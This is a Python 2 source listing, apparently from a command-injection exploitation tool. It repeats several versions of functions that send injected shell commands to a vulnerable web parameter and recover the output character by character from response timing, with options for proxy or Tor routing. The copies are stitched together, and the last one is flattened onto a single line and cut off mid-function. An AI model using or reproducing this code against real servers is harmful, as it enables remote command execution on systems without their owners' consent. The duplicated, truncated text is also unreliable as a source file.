def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
    """Send one request per candidate output length (GET path only visible).

    For each candidate length j in range(minlen, maxlen) a payload is built
    by tfb_payloads, URL-quoted, substituted for settings.INJECT_TAG in the
    URL and sent with urllib2.  The listing stops after the GET request is
    issued: how the timing values are used and what the function returns are
    not shown.  TAG is not referenced in the visible part.

    NOTE(review): the listing was flattened onto a single line, so the
    nesting below is reconstructed from the statements themselves; confirm
    it against the original file.
    """
    # Candidate lengths start at 0 when the file-write or file-upload option
    # is set, otherwise at 1.
    if menu.options.file_write or menu.options.file_upload :
        minlen = 0
    else:
        minlen = 1

    print "\n(*) Retrieving the length of execution output..."
    for j in range(int(minlen),int(maxlen)):

        # Build the value for candidate length j.  The payload text itself is
        # produced by tfb_payloads and is not visible here.
        if not alter_shell :
            payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
        else:
            payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)

        # With "--verbose", echo the payload to stdout (newlines shown as \n).
        if menu.options.verbose:
            sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)

        # start is taken just before the request; presumably it is used to
        # time the response, but that use is outside this listing.
        start = 0
        end = 0
        start = time.time()

        # GET is the default method.
        if http_request_method == "GET":

            # Percent-encode the payload before it is placed in the URL.
            payload = urllib.quote(payload)

            # Check whether the 'INJECT_HERE' tag was specified
            # (handled by parameters.do_GET_check).
            url = parameters.do_GET_check(url)

            # re.sub treats INJECT_TAG as a pattern and payload as the
            # replacement template, so every probe is a GET to the same
            # endpoint that differs only in the substituted value.
            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)

            #print target
            request = urllib2.Request(target)

            # Apply any extra headers.
            headers.do_check(request)

            # Send through the configured HTTP proxy, if any.
            if menu.options.proxy:
                try:
                    # install_opener replaces the process-wide default opener
                    # on every iteration; the handler maps the 'http' scheme.
                    proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
                    opener = urllib2.build_opener(proxy)
                    urllib2.install_opener(opener)
                    response = urllib2.urlopen(request)
                    response.read()

                # Only urllib2.HTTPError is handled here; other failures
                # (e.g. urllib2.URLError) are not caught in this branch.
                except urllib2.HTTPError, err:
                    print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
                    sys.exit(1)

            else:
                try:
                    response = urllib2.urlopen(request)
                    response.read()

                except urllib2.HTTPError, err:
                    print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
                    sys.exit(1)

        # The listing ends here; the remainder of the function is not shown.
def false_positive_check(
    separator,
    TAG,
    cmd,
    prefix,
    suffix,
    delay,
    http_request_method,
    url,
    vuln_parameter,
    OUTPUT_TEXTFILE,
    randvcalc,
    alter_shell,
):
    """Re-run a small timing probe and compare the result with randvcalc.

    Phase 1 tries output lengths 1 and 2; phase 2 tries the values 1 and 2
    for each position.  A probe counts as a match when the helper reports
    how_long >= delay.  The matched values are joined into a string, and
    that string is returned only when it equals str(randvcalc); no other
    return statement is visible.  TAG is not referenced in the body.

    The decision rests on a single elapsed-time sample per probe, so a slow
    or loaded server can satisfy how_long >= delay on its own; nothing here
    repeats a probe to confirm it.

    NOTE(review): the listing was flattened, so the nesting is reconstructed
    from the statements.  In particular the final comparison is assumed to
    sit inside the found_chars branch (output is only defined there);
    confirm against the original file.  randvcalc is presumably the expected
    result of a known calculation; verify against the caller.
    """
    found_chars = False
    if menu.options.verbose:
        sys.stdout.write("\n(*) Testing the reliability of used payload... ")
        sys.stdout.flush()

    for output_length in range(1, 3):

        # Build the length probe; the payload text comes from tfb_payloads.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )
        else:
            payload = tfb_payloads.cmd_execution(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )

        # Apply the configured prefix and suffix.
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # With "--verbose", echo the payload to stdout (newlines shown as \n).
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Pick the request helper from where the "INJECT_HERE" tag was
        # supplied: cookie, user-agent, referer, else the plain request path.
        # Each helper returns the value compared with delay below.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

        if how_long >= delay:
            found_chars = True
            break

    if found_chars == True:
        # range(1, output_length + 1) below visits every position.
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []
        percent = 0  # assigned but not read again in this function

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(1, 3):

                # Build the per-position probe.
                # NOTE(review): the alter-shell variant receives num_of_chars,
                # the other one does not; confirm that this is intended.
                if alter_shell:
                    payload = tfb_payloads.fp_result_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )
                else:
                    payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method)

                # Apply the configured prefix and suffix.
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # With "--verbose", echo the payload to stdout.
                if menu.options.verbose:
                    sys.stdout.write(
                        "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                    )

                # Same helper selection as in the length loop.
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)

                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)

                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

                # The numeric value itself (not chr()) is recorded.
                if how_long >= delay:
                    output.append(ascii_char)
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)  # computed, not returned
        output = "".join(str(p) for p in output)

        # Compared as strings.
        if str(output) == str(randvcalc):
            return output
def injection(
    separator,
    maxlen,
    TAG,
    cmd,
    prefix,
    suffix,
    delay,
    http_request_method,
    url,
    vuln_parameter,
    OUTPUT_TEXTFILE,
    alter_shell,
):
    """Recover a command's output one character at a time from timing.

    Phase 1 walks candidate lengths in range(minlen, maxlen) and stops at
    the first probe for which the request helper reports how_long >= delay.
    Phase 2 then walks every position 1..output_length and every code in
    range(32, 129), appending chr(code) for the first probe that meets the
    same test.

    Returns a tuple (check_how_long, output): the whole seconds spent in
    phase 2 and the recovered string, or (0, "") when no length matched.
    TAG is not referenced in the body.

    Each probe is one HTTP request and the only signal is a single
    elapsed-time sample compared with delay, so a slow or loaded server can
    produce a false match; nothing here repeats a probe to confirm it.
    Phase 2 sends at most output_length * 97 requests that differ only in
    the injected value.

    NOTE(review): the listing was flattened, so the nesting is reconstructed
    from the statements (notably the position of flush/print/break after
    the inner if/else pairs); confirm against the original file.
    """
    # Candidate lengths start at 0 when the file-write or file-upload option
    # is set, otherwise at 1.
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False
    sys.stdout.write("\n(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Build the length probe; the payload text comes from tfb_payloads.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )
        else:
            payload = tfb_payloads.cmd_execution(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )

        # Apply the configured prefix and suffix.
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # With "--verbose", echo the payload to stdout (newlines shown as \n).
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Pick the request helper from where the "INJECT_HERE" tag was
        # supplied: cookie, user-agent, referer, else the plain request path.
        # Each helper returns the value compared with delay below.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

        # First candidate length that meets the threshold wins.
        if how_long >= delay:
            if menu.options.verbose:
                print "\n"
            else:
                sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
                sys.stdout.flush()
            print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL
            found_chars = True
            break

    if found_chars == True:
        # range(1, output_length + 1) below visits every position.
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []
        percent = 0
        sys.stdout.write(
            "\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(percent) + "% ]"
        )
        sys.stdout.flush()

        for num_of_chars in range(1, int(num_of_chars)):
            # Codes 32..128 are tried in order; 128 lies outside 7-bit ASCII.
            for ascii_char in range(32, 129):

                # Build the probe for this position and candidate code.
                if alter_shell:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )
                else:
                    payload = tfb_payloads.get_char(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )

                # Apply the configured prefix and suffix.
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # With "--verbose", echo the payload to stdout.
                if menu.options.verbose:
                    sys.stdout.write(
                        "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                    )

                # Same helper selection as in the length loop.
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)

                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)

                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

                if how_long >= delay:
                    # Both branches record the character; the progress line is
                    # only redrawn when verbose output is off.
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        # percent is recomputed here but not read afterwards.
                        percent = (num_of_chars * 100) / output_length
                        float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))
                        sys.stdout.write(
                            "\r(*) Grabbing the output from '"
                            + OUTPUT_TEXTFILE
                            + "', please wait... [ "
                            + str(float_percent)
                            + "% ]"
                        )
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

    else:
        # No candidate length met the threshold.
        check_start = 0
        sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
        sys.stdout.flush()
        check_how_long = 0
        output = ""

    return check_how_long, output
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url,
              vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
    """Send one request per candidate output length (partial listing).

    For each candidate length in range(minlen, maxlen) a payload is built by
    tfb_payloads and sent either through cookie_injection_test or, on the
    GET path, substituted for settings.INJECT_TAG in the URL and sent via
    the proxy helper, the Tor helper or urllib2 directly.  The listing stops
    after the GET request is issued: how the timing values are used and what
    the function returns are not shown.  TAG is not referenced in the
    visible part.

    NOTE(review): the listing was flattened onto a single line, so the
    nesting below is reconstructed from the statements themselves; confirm
    it against the original file.
    """
    # Candidate lengths start at 0 when the file-write or file-upload option
    # is set, otherwise at 1.
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False  # its use is outside this listing
    sys.stdout.write("\n(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Build the length probe; the payload text comes from tfb_payloads.
        if not alter_shell:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)
        else:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)

        # With "--verbose", echo the payload to stdout (newlines shown as \n).
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") +
                             Style.RESET_ALL)

        # A cookie carrying the injection tag is handled by its own helper,
        # which returns how_long.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        else:
            # start is taken just before the request; presumably it is used
            # to time the response, but that use is outside this listing.
            start = 0
            end = 0
            start = time.time()

            # GET is the default method.
            if http_request_method == "GET":

                # Percent-encode the payload before it is placed in the URL.
                payload = urllib.quote(payload)

                # Check whether the 'INJECT_HERE' tag was specified
                # (handled by parameters.do_GET_check).
                url = parameters.do_GET_check(url)

                # re.sub treats INJECT_TAG as a pattern and payload as the
                # replacement template.
                target = re.sub(settings.INJECT_TAG, payload, url)
                vuln_parameter = ''.join(vuln_parameter)

                #print target
                request = urllib2.Request(target)

                # Apply any extra headers.
                headers.do_check(request)

                # Route the request: HTTP proxy, Tor, or direct.  In every
                # branch only urllib2.HTTPError is handled, by printing the
                # error and raising SystemExit.
                if menu.options.proxy:
                    try:
                        response = proxy.use_proxy(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
                        raise SystemExit()

                elif menu.options.tor:
                    try:
                        response = tor.use_tor(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
                        raise SystemExit()

                else:
                    try:
                        response = urllib2.urlopen(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
                        raise SystemExit()

        # The listing ends here; the remainder of the function is not shown.
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
    """Send one request per candidate output length (partial listing).

    For each candidate length in range(minlen, maxlen) a payload is built by
    tfb_payloads and sent either through cookie_injection_test or, on the
    GET path, substituted for settings.INJECT_TAG in the URL and sent via
    the proxy helper, the Tor helper or urllib2 directly.  The listing stops
    after the GET request is issued: how the timing values are used and what
    the function returns are not shown.  TAG is not referenced in the
    visible part.

    NOTE(review): the listing was flattened onto a single line, so the
    nesting below is reconstructed from the statements themselves; confirm
    it against the original file.
    """
    # Candidate lengths start at 0 when the file-write or file-upload option
    # is set, otherwise at 1.
    if menu.options.file_write or menu.options.file_upload :
        minlen = 0
    else:
        minlen = 1

    found_chars = False  # its use is outside this listing
    sys.stdout.write("\n(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Build the length probe; the payload text comes from tfb_payloads.
        if not alter_shell :
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
        else:
            payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)

        # With "--verbose", echo the payload to stdout (newlines shown as \n).
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

        # A cookie carrying the injection tag is handled by its own helper,
        # which returns how_long.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        else:
            # start is taken just before the request; presumably it is used
            # to time the response, but that use is outside this listing.
            start = 0
            end = 0
            start = time.time()

            # GET is the default method.
            if http_request_method == "GET":

                # Percent-encode the payload before it is placed in the URL.
                payload = urllib.quote(payload)

                # Check whether the 'INJECT_HERE' tag was specified
                # (handled by parameters.do_GET_check).
                url = parameters.do_GET_check(url)

                # re.sub treats INJECT_TAG as a pattern and payload as the
                # replacement template.
                target = re.sub(settings.INJECT_TAG, payload, url)
                vuln_parameter = ''.join(vuln_parameter)

                #print target
                request = urllib2.Request(target)

                # Apply any extra headers.
                headers.do_check(request)

                # Route the request: HTTP proxy, Tor, or direct.  In every
                # branch only urllib2.HTTPError is handled, by printing the
                # error and raising SystemExit.
                if menu.options.proxy:
                    try:
                        response = proxy.use_proxy(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
                        raise SystemExit()

                elif menu.options.tor:
                    try:
                        response = tor.use_tor(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
                        raise SystemExit()

                else:
                    try:
                        response = urllib2.urlopen(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
                        raise SystemExit()

        # The listing ends here; the remainder of the function is not shown.
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay,
                         http_request_method, url, vuln_parameter,
                         OUTPUT_TEXTFILE, randvcalc, alter_shell):
    """Re-run a small timing probe and compare the result with randvcalc.

    Phase 1 tries output lengths 1 and 2; phase 2 tries the values 1 and 2
    for each position.  A probe counts as a match when the helper reports
    how_long >= delay.  The matched values are joined into a string, and
    that string is returned only when it equals str(randvcalc); no other
    return statement is visible.  TAG is not referenced in the body.

    The decision rests on a single elapsed-time sample per probe, so a slow
    or loaded server can satisfy how_long >= delay on its own; nothing here
    repeats a probe to confirm it.

    NOTE(review): the listing was flattened, so the nesting is reconstructed
    from the statements.  In particular the final comparison is assumed to
    sit inside the found_chars branch (output is only defined there);
    confirm against the original file.  randvcalc is presumably the expected
    result of a known calculation; verify against the caller.
    """
    found_chars = False
    if menu.options.verbose:
        sys.stdout.write("\n(*) Testing the reliability of used payload... ")
        sys.stdout.flush()

    for output_length in range(1, 3):

        # Build the length probe; the payload text comes from tfb_payloads.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)
        else:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)

        # Apply the configured prefix and suffix.
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # With "--verbose", echo the payload to stdout (newlines shown as \n).
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                             payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Pick the request helper from where the "INJECT_HERE" tag was
        # supplied: cookie, user-agent, referer, else the plain request path.
        # Each helper returns the value compared with delay below.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter,
                                        http_request_method, url)

        if how_long >= delay:
            found_chars = True
            break

    if found_chars == True:
        # range(1, output_length + 1) below visits every position.
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []
        percent = 0  # assigned but not read again in this function

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(1, 3):

                # Build the per-position probe.
                # NOTE(review): the alter-shell variant receives num_of_chars,
                # the other one does not; confirm that this is intended.
                if alter_shell:
                    payload = tfb_payloads.fp_result_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
                        delay, http_request_method)
                else:
                    payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE,
                                                     ascii_char, delay,
                                                     http_request_method)

                # Apply the configured prefix and suffix.
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # With "--verbose", echo the payload to stdout.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                                     payload.replace("\n", "\\n") +
                                     Style.RESET_ALL)

                # Same helper selection as in the length loop.
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)

                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(
                        url, vuln_parameter, payload)

                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter,
                                                http_request_method, url)

                # The numeric value itself (not chr()) is recorded.
                if how_long >= delay:
                    output.append(ascii_char)
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)  # computed, not returned
        output = "".join(str(p) for p in output)

        # Compared as strings.
        if str(output) == str(randvcalc):
            return output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay,
              http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
              alter_shell, filename):
    """Recover a command's output one character at a time from timing.

    Phase 1 walks candidate lengths in range(minlen, maxlen) and stops at
    the first probe for which the request helper reports how_long >= delay.
    Phase 2 then walks every position 1..output_length and every code in
    range(32, 129), appending chr(code) for the first probe that meets the
    same test.

    Returns a tuple (check_how_long, output): the whole seconds spent in
    phase 2 and the recovered string, or (0, "") when no length matched.
    TAG and filename are not referenced in the body.

    Each probe is one HTTP request and the only signal is a single
    elapsed-time sample compared with delay, so a slow or loaded server can
    produce a false match; nothing here repeats a probe to confirm it.
    Phase 2 sends at most output_length * 97 requests that differ only in
    the injected value.

    NOTE(review): the listing was flattened, so the nesting is reconstructed
    from the statements (notably what the output_length > 1 guard covers and
    the position of break); confirm against the original file.
    """
    # Candidate lengths start at 0 when the file-write or file-upload option
    # is set, otherwise at 1.
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False
    sys.stdout.write("(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Build the length probe; the payload text comes from tfb_payloads.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)
        else:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)

        # Apply the configured prefix and suffix.
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # With "--verbose", echo the payload to stdout (newlines shown as \n).
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                             payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Pick the request helper from where the "INJECT_HERE" tag was
        # supplied: cookie, user-agent, referer, else the plain request path.
        # Each helper returns the value compared with delay below.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter,
                                        http_request_method, url)

        # First candidate length that meets the threshold wins.
        if how_long >= delay:
            # The success message is only printed for lengths above 1.
            if output_length > 1:
                if menu.options.verbose:
                    print "\n"
                else:
                    sys.stdout.write("[" + Fore.GREEN + " SUCCEED " +
                                     Style.RESET_ALL + "]\n")
                    sys.stdout.flush()
                print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL
            found_chars = True
            break

    if found_chars == True:
        # range(1, output_length + 1) below visits every position.
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []
        percent = 0
        sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE +
                         "', please wait... [ " + str(percent) + "% ]")
        sys.stdout.flush()

        for num_of_chars in range(1, int(num_of_chars)):
            # Codes 32..128 are tried in order; 128 lies outside 7-bit ASCII.
            for ascii_char in range(32, 129):

                # Build the probe for this position and candidate code.
                if alter_shell:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
                        delay, http_request_method)
                else:
                    payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE,
                                                    num_of_chars, ascii_char,
                                                    delay, http_request_method)

                # Apply the configured prefix and suffix.
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # With "--verbose", echo the payload to stdout.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                                     payload.replace("\n", "\\n") +
                                     Style.RESET_ALL)

                # Same helper selection as in the length loop.
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)

                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(
                        url, vuln_parameter, payload)

                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter,
                                                http_request_method, url)

                if how_long >= delay:
                    # Both branches record the character; the progress line is
                    # only redrawn when verbose output is off.
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        # percent is recomputed here but not read afterwards.
                        percent = ((num_of_chars * 100) / output_length)
                        float_percent = "{0:.1f}".format(
                            round(
                                ((num_of_chars * 100) / (output_length * 1.0)),
                                2))
                        sys.stdout.write("\r(*) Grabbing the output from '" +
                                         OUTPUT_TEXTFILE +
                                         "', please wait... [ " +
                                         str(float_percent) + "% ]")
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

    else:
        # No candidate length met the threshold.
        check_start = 0
        if not menu.options.verbose:
            sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL +
                             "]\n")
            sys.stdout.flush()
        else:
            print ""
        check_how_long = 0
        output = ""

    return check_how_long, output
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell): print "\n(*) Retrieving the length of execution output..." for j in range(1,int(maxlen)): # Execute shell commands on vulnerable host. if not alter_shell : payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method) else: payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload + colors.RESET) start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": payload = urllib.quote(payload) # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) #print target request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy= urllib2.ProxyHandler({'http': menu.options.proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) response = urllib2.urlopen(request) response.read() except urllib2.HTTPError, err: print "\n(x) Error : " + str(err) sys.exit(1) else: response = urllib2.urlopen(request) response.read() # Check if defined method is POST. else : parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. 
if menu.options.proxy: try: proxy= urllib2.ProxyHandler({'http': menu.options.proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) response = urllib2.urlopen(request) response.read() except urllib2.HTTPError, err: print "\n(x) Error : " + str(err) sys.exit(1) else: